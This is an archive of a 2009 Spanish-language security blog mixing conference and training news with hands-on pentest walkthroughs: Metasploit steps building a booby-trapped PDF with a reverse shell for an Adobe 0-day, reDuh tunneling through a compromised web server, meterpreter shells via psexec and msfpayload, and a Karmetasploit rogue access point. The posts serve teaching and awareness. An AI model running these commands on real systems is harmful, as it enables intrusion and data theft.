jueves, 31 de diciembre de 2009

No es un balance del 2009

Los balances de fin de año me generan mucha melancolía, así que esto solo es un repaso de algunos buenos momentos del año.

Sin dudas, uno de los momentos en donde se alinearon los planetas para mi, fue a principio de año cuando junto a un grupo excepcional de personas fundamos BASE4 Security S.A. Fue una de esas decisiones arriesgadas en las que te jugas mucho, pero a poco de cumplir nuestro primer año, puedo decir que la empresa es todo un éxito! y una de las mejores decisiones que tome en mi vida.


Junto a BASE4 estuve asustando a los usuarios con mi charla "Explotando el Eslabón Mas Débil" sobre client side attacks. Este tour de concientizacion me llevo por SSHNEA en Corrientes, PampaSeg en La Pampa, ADACSI y el CSIRT de Banelco, entre otros.


También hicimos un recorrido muy grande con el COMBAT training, por el cual habrán pasado unos 70 ninjas durante todo el año, y fue una de las cosas que mas disfrute porque me dio la oportunidad de conocer a gente maravillosa y hacerme de muchos nuevos amigos. Un gran saludo para todos!


El viaje a Las Vegas con todo el staff de la ekoparty (solo falto Giba) también fue increíble, asistimos a la Black Hat y la DEFCON, manejamos por el desierto desde Los Angeles a Las Vegas, y lo mas importante es que fue un viaje con amigos.


La ekoparty fue increíble, lo que siempre rescato es la oportunidad de reunirse con todos los viejos amigos y conocer a muchos amigos nuevos!

Con Bruno, Guillermo y Leonardo Nve

Con el blogger amigo Alejandro Eguía de Spamloco

Con los ninjas Alexander y Jorgito

Con Politos y el viejo viejo Phreaking

Con el lockpicking master Deviant Ollam

Deportivamente fue un año muy bueno también, especialmente los primeros 6 meses, donde hasta llegue 3o. en una carrera de 10km, luego corrí 30km y comencé a entrenar para mi primer maratón (42km)!

Lamentablemente me lesione una semana antes de la maratón y no la pude correr, pero será un nuevo objetivo para el 2010 junto a los Trotadores Urbanos ;-)


Quiero agradecer a todos los amigos, y muy especialmente a mi Gesolmina :) Les deseo a todos un prospero 2010 con mucho trabajo, salud y paz!

lunes, 28 de diciembre de 2009

UAVs en Argentina

Continuando con la temática de mi post anterior sobre UAVs que no cifran los feeds de video, me encontré con que en Argentina esta bastante desarrollada la producción de UAVs.

Gracias al amigo del blog Live4Tech, descubrí que casi todas las fuerzas armadas argentinas desarrollan sus propios UAVs y hasta hay empresas privadas desarrollando y exportando estos sistemas.

El Lipán M3 del Ejercito Argentino posee un alcance de 40km, 5 horas de autonomía, puede alcanzar una velocidad máxima de 170 km/h, transportar 20 kg y alcanzar los 2.000m de altura.


La Armada Argentina, también tiene su propio proyecto llamado "Guardián", y a continuación tienen un video detallando las características de este UAV:



Según algunos medios, la Fuerza Aérea Argentina, tiene ambiciosos proyectos que proponen, para el largo plazo, un UAV de 90 metros de envergadura, propulsado por 14 motores y operados con células de combustible recargadas con energía solar, lo que les permitiría volar a 20000 metros de altura, durante 3 meses, portando una carga útil de 100 kg.

En el ámbito privado, la empresa cordobesa Nostromo Defensa S.A. diseñó los prototipos Yarará, Caburé y Yaguá, que por sus reducidas dimensiones pueden ser transportados en contenedores pequeños o incluso en mochilas.

La exportación de su UAV "Yarará" al Departamento de Defensa de USA en el año 2006 colocó la imagen de la empresa al más alto nivel dentro del mercado internacional de UAV. Se comenta que algunos de sus ingenieros trabajaron en el desarrollo del famoso misil Cóndor I y II de la Fuerza Aérea Argentina.



Según algunos trascendidos, los cuales no puedo confirmar, Gendarmería Nacional, una fuerza de seguridad (no militar) que se encarga de proteger las fronteras, también estaría utilizando modelos radiocontrolados con cámaras incorporadas para hacer seguimientos e inteligencia sobre las zonas costeras, pero a través de particulares que pueden costear el desarrollo de los mismos.

La siguiente seria una imagen obtenida del modelo utilizado por Gendarmería:


En este ultimo caso, y "probablemente" en el resto de los UAVs argentinos, no se estaría cifrando la transmisión de video.

FUENTES:
- KungFooSion: Más Fácil que Capturar Video de Aviones Espía
- Wikipedia: Lipán M3
- Wikipedia: Lista de UAVs existentes
- Nostromo Defensa S.A.
- Nueva Mayoría: Desarrollo de vehículos aéreos no tripulados en la región
- Argentina: Continuan los desarrollos de aeronaves no tripuladas
- UAV "Guardian" de la Armada Argentina

miércoles, 23 de diciembre de 2009

LOD Subcampeón Argentino de Paintball

Mis amigos de LOD quedaron segundos en el campeonato argentino de paintball así que no quería dejar de felicitarlos!! Sos Groso LOD!! ;-)


Y esta es la actitud ekoparty aplicada al paintball, con los logos de la eko en las marcadoras:


Ver también: Tres Minutos de Furia

martes, 22 de diciembre de 2009

Más Fácil que Capturar Video de Aviones Espía

Hace unos días, el WSJ publico que unos insurgentes iraquíes capturaron feeds de video, enviados por aviones espía no tripulados, con un software ruso que solo cuesta 26 USD.

Los Predator "drones", conocidos como UAV "Unmmanned Aerial Vehicle", son aviones no tripulados creados con el objetivo de realizar "survillance, reconnaissance and weapons delivery" :?


El escandalo se genero porque los UAV no cifran los feeds de video, y esto permite que el enemigo conozca cuales son las zonas y objetivos bajo vigilancia.

La respuesta del ejercito, fue que cifrar los feeds seria altamente costoso porque los UAVs utilizan tecnología propietaria (General Atomics Aeronautical Systems), y que el cifrado agregaría un retardo en las comunicaciones que impediría "eliminar al enemigo" con precisión.

Los UAV transmiten las capturas de video desde el aire a una base terrestre, o a través de vínculos satelitales. Al parecer, también usan o han usado satélites privados, los usados para TV, para transmitir el video.

A raíz de esto, es que me llama la atención que recién ahora se haya generado tanto escandalo, y mas aun cuando en Agosto tuvimos a Leonardo Nve en la ekoparty, dando una charla sobre captura de datos, y ataques desde Internet, a enlaces satelitales ;)


Pero como si esto fuera poco, recientemente Raloef Temming dio una presentación en la ZaCon, en donde demostró diferentes "debilidades" que poseen los UAV. Como por ejemplo, correlacionar una imagen del feed con Google Earth, detectar si estamos siendo "pintados" por un laser para que luego el UAV nos arroje un misil, o capturar la señal del laser para luego "pintar" otra víctima. (Vayan al minuto 14:14)



Lo mas triste de todo, es que cada UAV cuesta aproximadamente 10.000.000 USD cada uno, y el premio nobel de la paz, piensa comprar mas de 300 de estos, para continuar con la pacificación de Medio Oriente.


REFERENCIAS:
- SkyGrabber Software
- ZaCon09 - Raloef Temming, Make Tea not War
- Wikipedia: MQ-1 Predator
- Wired: Insurgents Intercept Drone Video in King-Size Security Breach
- General Atomics Aeronautical Systems
- WSJ - Insurgents Hack U.S. Drones

jueves, 17 de diciembre de 2009

Explotando el 0-day de Adobe Reader

El Lunes 14, Adobe alerto a sus usuarios que se estaba explotando activamente una vulnerabilidad para la última versión de Adobe Reader y Acrobat.

El Martes 15, Adobe anunció a todos sus usuarios que van a continuar desprotegidos hasta el 12 de Enero del 2010, cuando salga el parche de seguridad.

El Martes 15, H.D. Moore anunció vía Twitter que ya se encontraba disponible el exploit para el 0-day de Adobe en MetaSploit.

Probé el exploit de MetaSploit en una máquina virtual con Windows XP y la ultima versión de Adobe Reader (9.2) y anduvo muy bien, solamente tuve que aumentarle la memoria a 1GB de RAM, de lo contrario no me funcionaba.

# creo el archivo .pdf en MetaSploit
./msfconsole
use exploit/windows/fileformat/adobe_media_newplayer
set FILENAME feliz_navidad.pdf
set PAYLOAD windows/shell/reverse_tcp
set LHOST 192.168.10.109
exploit

# dejo escuchando por la conexión reversa
./msfcli exploit/multi/handler PAYLOAD=windows/shell/reverse_tcp LHOST=192.168.10.109 E

Solución: deshabilitar JavaScript en Adobe.


FUENTES:
- Security Advisory for Adobe Reader and Acrobat
- CVE-2009-4324
- Bugtraq ID: 37331
- Adobe PSIRT

martes, 15 de diciembre de 2009

Último COMBAT training del 2009!

Ayer Lunes, termino el ultimo COMBAT training del 2009, después de 3 semanas intensivas de trainings y charlas por diferentes lugares.

De izquierda a derecha, Emiliano, Fabio y Jorge (Tierra del Fuego), "/me" y Carlos. Faltan en la foto, Diego G., Diego R. y Ricardo. En esta edición del training me volvieron loco con los faltazos, sin dudas esta época del año es bastante complicada para las empresas.


Ayer también, se realizo el CTF del COMBAT training y el ganador fue Diego García, felicitaciones Diego! En segundo lugar y peleando la punta, quedo Emiliano, y en tercero Ricardo :)


No hay mas trainings por este año, pero pienso dedicar el verano a preparar el COMBAT training 2.0, stay tunned! ;-)

martes, 8 de diciembre de 2009

HTTP Tunneling con reDuh

reDuh nos permite realizar una conexión TCP, a través de tráfico HTTP totalmente válido. Un ejemplo simple, sería tomar control de un servidor Web en la DMZ, y desde allí realizar una conexión RDP a un servidor de la LAN.


El primer paso seria subir el reDuh Server al servidor Web comprometido. reDuh Server consta de un script programado en 3 lenguajes diferentes (".jsp", ".asp" y ".php"), según la tecnología del servidor Web deberíamos elegir cual de ellos subir.

Luego deberíamos ejecutar el reDuh Client que se conectara con el reDuh Server, y abrirá una interfaz de administración en el puerto TCP/1010 de nuestro sistema, a este puerto nos conectamos utilizando telnet.

// como root (ya que abre el puerto 1010), ejecutamos el cliente
# java -jar reDuhClient.jar http://www.victima.com/reDuh.php

// nos conectamos a la interfaz de administración
telnet localhost 1010

Una vez conectados a la interfaz de administración, podemos utilizar 3 comandos: "[usage]", "[createTunnel]" y "[killReDuh]".

Primero vamos a crear un túnel que nos permita realizar una conexión RDP a un servidor de la LAN, obviamente debemos conocer la IP.

// creamos el túnel
>>[createTunnel]1234:10.10.10.10:3389

Luego con nuestro cliente RDP nos conectaremos al puerto local 1234 que nos permitirá realizar la conexión con el servidor de la LAN.


A partir de este momento, deberíamos tener acceso al servidor de la LAN mediante una conexión RDP, que esta pasando a través de un servidor Web en la DMZ. awesome! :)

Para terminar el túnel utilizamos el siguiente comando:

// terminamos el túnel
>>[killReDuh]

Y este es el final, verdaderamente maravilloso...


Referencias:
- Sensepost reDuh
- reDuh Server
- reDuh Client

domingo, 6 de diciembre de 2009

Primera edición de PampaSeg

Este 4 y 5 de Diciembre tuvo lugar la primera edición de PampaSeg, las Jornadas de Software Libre y Seguridad Informática, en Santa Rosa, La Pampa.


Este fue el primer evento de su tipo que se realizo en La Pampa, y tuvo una importante convocatoria de Speakers de todo el país. Sin ninguna duda, PampaSeg será un gran punto de desarrollo para la seguridad informática en toda la región pampeana.

Para comenzar con el pie derecho, el Honorable Consejo Deliberante del Municipio de Santa Rosa declaro a PampaSeg "evento de interés cultural". w0w! :)

Desde BASE4 Security y ekoparty estuvimos apoyando este evento, pero el fundador y principal promotor de PampaSeg es Federico Bustos, asi que todas mis felicitaciones para el. Grande Fede!

Por mi parte, también estuve dando una charla sobre client side attacks, y como pueden ver evangelizando en La Pampa sobre la ekoparty:


Mi amigo personal, Juan Pablo Borgna, otro de los fundadores de ekoparty, también estuvo dando una "peligrosa" charla sobre Wireless Hacking, y sus interesantes experiencias durante los wardrivings que el se encarga de organizar cada año durante la conferencia:


Saludos a todos los talibanes del Software Libre que conocí en La Pampa! Debo confesar que cuando prendía la Mac para mi charla, me cayeron algunas gotas de transpiración... :-?

COMBAT training @ Rosario

Durante toda la semana pasada realizamos el primer COMBAT training en la ciudad de Rosario.


Realmente espero volver pronto, la ciudad de Rosario no tiene comparación, y el grupo de Ninjas que se reunió tampoco ;-) De izquierda a derecha, Alejandro, Martin, (yo), Mauro, Jerónimo y Leandro.


El jueves tuve que partir raudamente hacia La Pampa para PampaSeg, pero Jerónimo continuo con todo su wi-foo y me hizo saber que el ganador del CTF fue Alejandro Sorrentino, felicitaciones Ale!

jueves, 3 de diciembre de 2009

hackers @ Rosario

Toda esta semana estuve dictando el COMBAT training en la ciudad de Rosario, y como no podía ser de otra forma, los amigos Carlos Tori y Ulises Cuñe, me llevaron a conocer la noche rosarina.


Espero que se repita pronto!

viernes, 27 de noviembre de 2009

Entrenando un Ejército de Ninjas

Hoy termino una nueva edición del COMBAT training, con una audiencia cada vez mas numerosa, variada y técnica.

De izquierda a derecha, Ariel (USA), Alejandro, Marcos, Gabriel, (yo), Sebastián, Matías (Córdoba), Pablo (Tierra del Fuego) y Jerónimo. Faltan en la foto Fernando, y los amigos de Colombia, Hernando y Guillermo, que se tuvieron que ir antes.


Durante toda la semana del COMBAT training, los alumnos van sumando puntos en cada laboratorio que deben realizar, y también suman puntos en el CTF del ultima día. No deja de sorprenderme, como tímidamente a nadie le interesa "la sucia competencia" por los puntos durante los primeros días, para luego terminar la semana con sabotajes a la PC de los compañeros, amenazas y complots! :O

Bajo una gran presión, y temiendo por su integridad física, Matías Ochoa de Córdoba, fue el Ninja que se llevo la katana del COMBAT training!


Nuevamente Jerónimo Basaldua aplico todo su wi-foo durante el día de ayer en el módulo de Wireless Hacking. Esta vez no pude participar, por la charla que estuve dando en el CSIRT de Banelco, pero escuche que pasaron cosas peligrosas durante esas horas ;)

La semana que viene estaré dictando el COMBAT training en la ciudad de Rosario, el siguiente fin de semana estaré en PampaSeg, y luego tendremos el ultimo COMBAT training del año otra vez en Buenos Aires.

jueves, 26 de noviembre de 2009

Charla en el CSIRT de Banelco

Durante la tarde de hoy participe como orador en un evento organizado por el CSIRT de Banelco con motivo de la Semana de la Seguridad Informática.


Realmente me sorprendió el excelente trabajo que esta realizando el CSIRT de Banelco, no solo dando respuesta a los incidentes de todos sus bancos adheridos, sino también con muchas otras acciones dirigidas a mejorar la seguridad de todas las organizaciones.

Despues de mi charla sobre ataques dirigidos del tipo client side, Pablo Carretino de Banelco, realizo una presentación sobre el trabajo del CSIRT en un incidente muy complejo del cual participaron que involucraba redes Fast Flux, y para finalizar Eduardo Carozo del CSIRT de Antel (Uruguay), realizo una presentación sobre el FIRST y la respuesta coordinada ante incidentes en el mundo.

Actualmente el CSIRT de Banelco esta siendo sponsoreado por el CSIRT de Antel y el ArCERT, que estuvo representado durante el evento por su coordinador Gastón Franco, para ingresar al FIRST.

Felicitaciones para Lucas Paus, Pato "el ninja" Castagnaro y Lucas Coronel por el excelente trabajo que están realizando! ;-)

jueves, 19 de noviembre de 2009

Semana de la Seguridad Informática

Del próximo 23 al 30 de Noviembre comienza la Semana de la Seguridad Informática, una iniciativa creada para la realización de acciones de capacitación y/o concientización en la materia.

Estas acciones son de gran importancia para prevenir que miembros de nuestra organización puedan cometer errores que provoquen perdidas millonarias:



Durante la semana que viene voy a estar dictando el anteúltimo COMBAT training del 2009, y también voy a dar una charla en un evento organizado por el CSIRT de Banelco con motivo de la Semana de la Seguridad Informática.

jueves, 12 de noviembre de 2009

Mostrame La Guita!

Una de las charlas mas interesantes de la ekoparty fue sin dudas la de Pedram Amini, titulada "Mostrame la Guita! Adventures in Buying Vulnerabilities", en donde Pedram nos conto algunas anécdotas y estadísticas del mercado de la compra/venta de vulnerabilidades.


"Guita", en el lunfardo rioplatense significa "dinero" (ver Wikipedia), y "Mostrame La Guita!" seria un paralelismo a la famosa frase "Show me The Money!".

La charla cubrio todo el circuito de la compra/venta de vulnerabilidades, pasando por los researchers, el mercado y los vendors. Pero en mi opinión lo mas interesante fue conocer un poco mas sobre quienes son los compradores, que hacen con lo que compran y cuanto pagan por ello.

Hoy en dia, hay una gran cantidad de prestigiosos researchers que se ganan la vida honestamente vendiendo las vulnerabilidades que descubren. Pero como en cualquier otro negocio, vamos a encontrar un mercado legal, un mercado negro, y otro con muchos grises.

Según "Mostrame la Guita!", el mercado se divide de la siguiente forma:

"White" Market:
- < 20.000 U$D:
- promedio entre 5.000 y 15.000 U$D

"Grey" Market:
.gov resellers:
- promedio entre 20.000 y 100.000 U$D
.gov:
- entre 100.000 y 1.000.000 U$D
- promedio es < 250.000

"Black" Market:
- 20.000 - 100.000 U$D
- cambios de precio a ultimo momento

Siempre me costo entender que gana el "White" Market comprando vulnerabilidades. Algunos de las razones son las siguientes:

- Suscripción anual para clientes que pagan por enterarse primero (sin detalles/sin PoC).
- Productos de seguridad que crean mayor protección contra estos ataques, como firmas para un IDS/IPS por ejemplo.
- Monitoreo mundial de explotaciones con 0-days.
- Reventa de las vulnerabilidades.

En el "Gray" Market, encontramos a gobiernos y a intermediarios de gobiernos. Puede pasar que el researcher no obtenga crédito por su descubrimiento, que se exija un PoC que explote la vulnerabilidad, que el Vendor nunca sea contactado ni tampoco se publique un advisory, y por supuesto que nunca sepamos que se planea hacer con todo eso. Pero claro, se paga mucho mas (hasta 1.000.000 U$D!)

El "Black" Market no hace falta comentarlo ;) Pero todo esto es solo un apice de lo que podemos encontrar en la presentación de Pedram, les recomiendo leerla en profundida, ver las "Notas del Presentador" en Google Docs, y también leer un documento de Charlie Miller llamado "The Legitimate Vulnerability Market", también sobre la misma temática.

Finalizando, me fascino esta presentación, aunque me hubiera sorprendido aun mucho mas, si en vez de llamarse "Mostrame La Guita!", se hubiera llamado "Che boludo, Mostrame La Guita!" :P

FUENTES:
- Presentación "Mostrame La Guita!" en Google Docs
- DVLabs Blog: "Mostrame La Guita!"
- DVLabs Blog: Ekoparty Wrap Up
- Wikipedia: Guita

miércoles, 11 de noviembre de 2009

Seguridad de los nuevos DNI Argentinos

En el blog de Matt me encontré con un interesante video de La Nación que relata las medidas de seguridad de los nuevos DNI Argentinos.



Casualmente, hace alrededor de 1 mes inicie los tramites para obtener un nuevo DNI porque me perdieron el anterior (si Gesolmina, fuistes vos!), obviamente esperaba tener mi documento para el 2011, con suerte. Pero increíblemente, a solo unos días del anuncio de los nuevos DNI, hoy llego Correo Argentino a traerme mi nuevo documento!

Ahora, yo no puedo tener mas mala suerte, el cartero me pedía un "papelito" que supuestamente me dieron cuando realice el tramite, y como no se donde deje ese papelito, no me entrego el DNI... aaaarrgggggggHHH!!!

PampaSeg en Diciembre

El próximo 4 y 5 de Diciembre tendrán lugar las Jornadas de Software Libre y Seguridad Informatica en La Pampa.


El evento es abierto a toda la comunidad, con entrada libre y gratuita. El cupo es limitado a unas 100 personas aproximadamente, por lo cual se requerirá una pre-acreditación desde la web http://www.pampaseg.com

Voy a tener el gusto de dar una charla en este evento, asi que si estan por La Pampa por esas fechas nos vemos alli!

domingo, 8 de noviembre de 2009

Prefetch en Meterpreter

Siempre me llama la atención la integración de técnicas forenses y anti-forenses al Penetration Testing, como el reciente script para Meterpreter que permite obtener los datos de Prefetch.

¿ Que es Prefetch ?

Cada vez que abrimos una aplicación en Windows se crea un archivo ".pf" en el directorio (%SYSTEMROOT%\Prefetch\), este archivo contiene información para acelerar las aplicaciones que seran abiertas en el futuro.

Dentro del archivo .pf podemos encontrar la fecha y hora en la que el archivo fue abierto, modificado o accedido por ultima vez, y también la cantidad de veces que este fue ejecutado.

El nombre del archivo .pf se arma "NOMBRE-HASH.pf", en donde el HASH se calcula con el path del lugar en donde se encontraba el archivo, por lo que si este fue ejecutado de 2 lugares diferentes, vamos a tener 2 archivos .pf diferentes.

Durante un Penetration Test, conocer cuales son los programas mas utilizados en un sistema nos puede ayudar a identificar los hábitos del administrador o el rol de este sistema en la red.

Hay una herramienta gratuita llamada Windows File Analyzer que nos permite visualizar el contenido de los archivos Prefetch:


Shell con Meterpreter

A continuación dos formas sencillas de obtener una shell con meterpreter sin necesidad de explotar una vulnerabilidad.

El siguiente modulo es similiar al "psexec" de SysInternals, y si le proveemos el user/pass de la víctima, nos permitira ejecutar un "payload":


use windows/smb/psexec
set PAYLOAD windows/metepreter/reverse_tcp
set RHOST 192.168.13.129
set LHOST 192.168.13.131
set SMBUser Administrador
set SMBPass password
exploit


Otra forma, es crear un binario con el payload, lo transferimos a la víctima, luego dejamos escuchando por la conexión reversa y ejecutamos el binario para generar la conexión con meterpreter:


./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.13.131 X > meterpreter.exe

./msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.13.131 E


Prefetch con Meterpreter

Para utilizar Prefetch primero deberíamos actualizar Metasploit (esto hacerlo antes de obtener la shell):


cd /pentest/exploits/framework3
svn update

./msfconsole
run prefetchtool -h



Si es la primera vez que utilizamos Prefetch, el script bajara "prefetch.exe" del repositorio, para luego subirlo y ejecutarlo en la víctima. A continuación listamos los 5 programas mas utilizados en la víctima con el comando "run prefetchtool -x 5":


Otra feature interesante dentro de meterpreter es "timestomp", que nos permite modificar la fecha de creación, modificación y ultimo acceso de los archivos, pero eso lo dejo para otro post... ;)

FUENTES:
- Milo2012's Security Blog: Meterpreter Script for Prefetch-Tool
- Laramies Corner: Windows Prefetcher and forensic analysis
- Windows File Analyzer
- PaulDotCom - Episode 171
- What is the Prefetcher?
- Forensics Wiki - Prefetch

viernes, 6 de noviembre de 2009

Una Final Dramática!

El día de ayer termino el COMBAT training (extended edition) con una final dramática en el CTF "Capture The Flag"!

La versión extendida del COMBAT training se dicto 1 día por semana, durante 5 semanas, e iba dirigida a quienes no podían tomarse una semana completa de training.


Quiero felicitar a Patricio Castagnaro quien gano el CTF y se llevo la espada ninja, y también a Diego Nadares que dio una gran pelea en todo momento! También extender las felicitaciones a Esteban Piloni y Sergio "Moises" Veron por el gran trabajo durante toda la semana!


Como siempre los premios del COMBAT training son armas orientales, esta vez teníamos la espada ninja para el primer lugar, un set de cuchillos para lanzar para el segundo y estrellas ninjas para el resto.


Jeronimo Basaldua, el experto en Wireless Security de BASE4, dicto el modulo de Wireless Hacking del COMBAT training.


Lamentablemente Jeronimo sufrió un accidente manipulando la espada (miren su frente en la foto grupal), al parecer Jeronimo estudiaba kendo unos años atras y en una maniobra poco afortunada durante el training se corto a si mismo... :?

Por consultas sobre el COMBAT training contactarse a capacitacion@base4sec.com

jueves, 5 de noviembre de 2009

Karmetasploit en BackTrack 4

Actualizando algunos labs del COMBAT training para BackTrack 4, aquí les dejo algunas notas para jugar con Karmetasploit.



- Ponemos la placa en modo monitor:

airmon-ng start wlan0


- Levantamos el Access Point falso en la interfaz en modo
monitor:

airbase-ng -P -C 30 -e “Linksys” -v mon0


- Configuramos el rango de IPs que entregara el servidor
DHCP:

nano /etc/dhcp3/dhcpd.conf

option domain-name-servers 10.0.0.1;
default-lease-time 60;
max-lease-time 72;
ddns-update-style none;
log-facility local7;

subnet 10.0.0.0 netmask 255.255.255.0 {
range 10.0.0.140 10.0.0.240;
option routers 10.0.0.1;
option domain-name-servers 10.0.0.1;
}


- Configuramos la IP en la interfaz que creo airbase-ng:

ifconfig at0 up 10.0.0.1 netmask 255.255.255.0


- Levantamos el DHCP que le entregara las IPs a las
victimas que se conecten al Access Point falso:

/etc/init.d/dhcp3-server start


- Vemos las IPs que entrega el DHCP:

tail -f /var/log/messages


- Bajamos el script de Karma y corremos Metasploit:

cd /pentest/exploits/framework3

wget http://digitaloffense.net/tools/karma.rc

./msfconsole -r karma.rc


- Podemos obtener los datos guardados en karma.db
de esta forma:

sqlite3 karma.db
.tables
select * from notes;
.quit

domingo, 1 de noviembre de 2009

Tres Minutos de Furia

Hoy tuvo lugar la 2a fecha del Torneo Argentino de Paintball y pase la tarde como "utilero" del equipo LOD (Legion of Doom), unos amigos que competían.



Todavía me acuerdo de los comienzos de LOD y ese famoso partido en Urban Paintball donde nos robaron de comienzo a fin... :P

Go Go Go LOD! Vamos por la tercer fecha! ;-)

martes, 27 de octubre de 2009

Publicados los Videos del Seminario de ArCERT

ArCERT publico los videos de las jornadas de seguridad realizadas recientemente para festejar sus 10 años de vida.


El evento tuvo lugar el 1 y 2 de Octubre, y se dividio en un dia de seminarios y otro de talleres sobre seguridad informática. El evento fue realmente excelente, principalmente por la calidad de los oradores, asi que mis felicitaciones para el ArCERT.

Videos de los TALLERES:

- Ingeniería reversa de malware: Una introducción (Hernan Racciatti)

- Wireless 802.11 "el otro lado" (Ezequiel Sallis)

- Tendencias de seguridad en tecnologías para aplicaciones (Ivan Arce)

- La Web desde el ojo de un atacante (Nahuel Grisolia)


Videos de los SEMINARIOS:

- Apertura de las Jornadas (Juan Manuel Abal Medina - Eduardo Thill)

- La respuesta internacional a los incidentes de seguridad (Eduardo Carozo - Gaston Franco)

- La visión Jurídica: necesidad de marco normativo (Lisandro Teskiewicz - Pablo Pallazi - Ricardo Saenz - Gustavo Presman)

- La seguridad cibernética en el gobierno de Brasil (Raphael Mandarino Jr.)

- La visión del Sector Privado: necesidad de articulación (Julio Ardita - Horacio Barrozo - Pablo Silberfich)

- Protección de infraestructura criticas de España (Fernando Jose Sanchez Gomez - Tomas Martin Iñurrieta)

- ArCERT: 10 años de experiencia - Pasado y futuro (Pedro Janices - Patricia Prandini)

lunes, 26 de octubre de 2009

Concientización de Usuarios

Los que trabajamos en seguridad siempre nos encontramos con dificultades a la hora de concientizar a los usuarios sobre los riesgos, tal vez deberíamos aprender sobre las campañas de concientización que se hacen en los viejos ascensores de Buenos Aires :-?

viernes, 23 de octubre de 2009

Kit del Presentador

Como no todo pasa por el Presentation Zen, aquí les dejo algunas recomendaciones sobre hardware que me ha resultado muy bueno al momento de dar trainings y presentaciones.

Control Remoto y Puntero Laser

El siguiente es el Logitech 2.4 GHz Cordless Presenter, realmente una joya!! lo que mas me gusta es que es sencillo, básico y muy profesional:


Diseñado para Windows/PowerPoint pero con Mac/Keynote tambien funciona sin ningun problema.

Posee incorporado un puntero laser muy poderoso, permite controlar el volumen de nuestra laptop, salir de la presentación, poner la pantalla en negro(solo en Windows) y tiene un timer para que podamos controlar el tiempo. Altamente recomendable.

Proyector de Video

Esto debe ser a lo que menos importancia le damos durante una presentación, y en charlas técnicas donde hacemos demos en vivo juegan un papel muy importante.

Para mi la clave del proyector se encuentra en la resolución que puede manejar, mas aun cuando al crear los slides de nuestra charla podemos elegir con que resolución hacerlos, imaginense armar los slides de 1280 x 720 y que el proyector solo maneje 800 x 600.

Peor aun es si nuestra laptop tiene una pantalla "wide" de 1280 x 800 y hacemos demos en vivo con varias máquinas virtuales. Me paso que el proyector solo soportaba 800 x 600 y las pantallas de las VM's quedaron demasiado grandes.

El siguiente es un proyector Dell 1609WX, soporta 1280 x 800 por lo que podemos proyectar en formato wide sin problemas:


Soporta 2500 lumenes, lo que también es un factor importante si estamos proyectando desde lejos o en lugares luminosos.

Lo que todavía no pude probar son esos lapices que te permiten escribir en la pantalla, igualito a lo que hacia Alfredo Ortega en la ekoparty ;-) Mas recomendaciones son bienvenidas!

Posts relacionados:
- Cómo Mejorar Nuestras Presentaciones
- Claves Para una Presentación Inolvidable

miércoles, 21 de octubre de 2009

USB Booting con VMWare

Estuve probando el ataque "Evil Maid" en una máquina virtual y me encontré con que la BIOS de VMWare no soporta el booteo desde USB... increíble!

Evil Maid es un ataque contra sistemas que tienen cifrado completo de disco como TrueCrypt, y la idea consiste en conectar un pendrive USB con una imagen booteable de Linux que instalaría un "sniffer". Luego cuando el usuario ingrese su contraseña de TrueCrypt, esta quedaría guardada en alguna parte del disco, y el atacante la podría obtener volviendo a bootear la laptop desde el pendrive USB.

Al parecer el hardware virtual de VMWare esta basado en una motherboard para Pentium 2 y en aquella época las BIOS no permitían bootear desde USB. Intente que VMWare directamente bootee la imagen del pendrive pero no funciono, asi que encontré el siguiente workaround por si alguien necesita bootear desde USB.

Antes que nada, el booteo de VMWare es tan rápido que no da tiempo a intentar ingresar a la BIOS, pero agregando la siguiente linea en el archivo ".vmx" podremos forzar el ingreso durante un booteo:

bios.forceSetupOnce = "TRUE"

Para bootear con USB, primero vamos a decirle a VMWare que bootee una imagen de un Boot Manager llamado PLoP:


Una vez que PLoP se ha cargado, entre otras opciones nos permitiría bootear desde USB:


Cuando elegimos bootear desde USB, finalmente se cargara el Linux que esta en el pendrive y podremos realizar el ataque "Evil Maid" en VMWare:


Igualmente el ataque nunca me funciono, Evil Maid no detecta el Boot Loader de TrueCrypt, pero estoy seguro que es algún problema de VMWare porque cuando hago el cifrado de todo el disco (lo hice 2 veces pfffff..) me aparecen algunos errores de integridad en el disco.

Después de dedicarle algunas horas a esto me aburri pero me gusto lo del USB Booting, todo esto lo probe con VMWare Fusion en Mac OS X Leopard.

- Evil Maid goes after TrueCrypt!
- PLoP Boot Manager

lunes, 19 de octubre de 2009

YETI Total Security

YETI Total Security, seguridad total para su empresa, presenta sus nuevos dispositivos de Bycicle Endpoint Protection:



Solamente jugando con mi kit del Club de Lockpicking y un candado marca YETI de la bicicleta de mi cuñada... ;-)

domingo, 18 de octubre de 2009

COMBAT Trainings en Rosario y Cordoba

Durante noviembre vamos a tener una maraton de COMBAT Trainings que van a incluir las ciudades de Rosario y Cordoba. Stay Tunned!


Actualmente estamos dictando el COMBAT Training -extended edition-, que es el clásico training intensivo de 5 dias pero dictado en un 1 dia por semana durante 5 semanas. En este momento vamos por la segunda semana, asi que los interesados en esta modalidad deberán esperar hasta el próximo año.

Mientras tanto, este es el calendario de trainings para Noviembre:

- Córdoba Capital (16 al 20 de Noviembre)

- Ciudad de Buenos Aires (23 al 27 de Noviembre)

- Rosario (30 de Noviembre al 04 de Diciembre)

También estamos planificando trainings en Mendoza, Tierra del Fuego y el sur de Chile, si estan interesados pueden contactarse con Sol Argento a capacitacion@base4sec.com.

Mas info sobre los trainings aqui o en la web de base4.

martes, 13 de octubre de 2009

El Maravilloso Mundo del Photoshop II

Un estudio logro demostrar como el contraste de una imagen es un factor importante para la percepción del genero sexual de una cara.

A continuación, pueden ver a la izquierda la imagen de una mujer y a la derecha la de un hombre, ¿o no?


Este fue el ganador del tercer lugar de un concurso de efectos visuales, en donde a una misma cara "androgina", cuando se le aplica mayor contraste se crea la ilusion del sexo femenino y con menor contraste la del sexo masculino.

Me pregunto si este tipo de técnicas se esta utilizando para realizar reconocimientos automáticos faciales en imágenes.

Hablando de efectos visuales, no queria dejar de mencionar el desastre de photoshop de Ralph Lauren de la semana pasada, en donde retocaron el cuerpo de una modelo a formas realmente imposibles para un ser humano.


Luego de que varios medios hablaran sobre esto, Ralph Lauren intento censurar a los mismos mediante DMCA takedown notices, y a partir de allí el desastre se transformo en catástrofe cuando todo el mundo comenzó a hablar sobre ello, lo que se conoce como el Streisand Effect.

- El Maravilloso Mundo del Photoshop I

lunes, 12 de octubre de 2009

El Arte de la Elegancia

Recien vuelvo del recital de Los Fabulosos Cadillacs donde presentaban su nuevo disco "El Arte de la Elegancia de LFC".

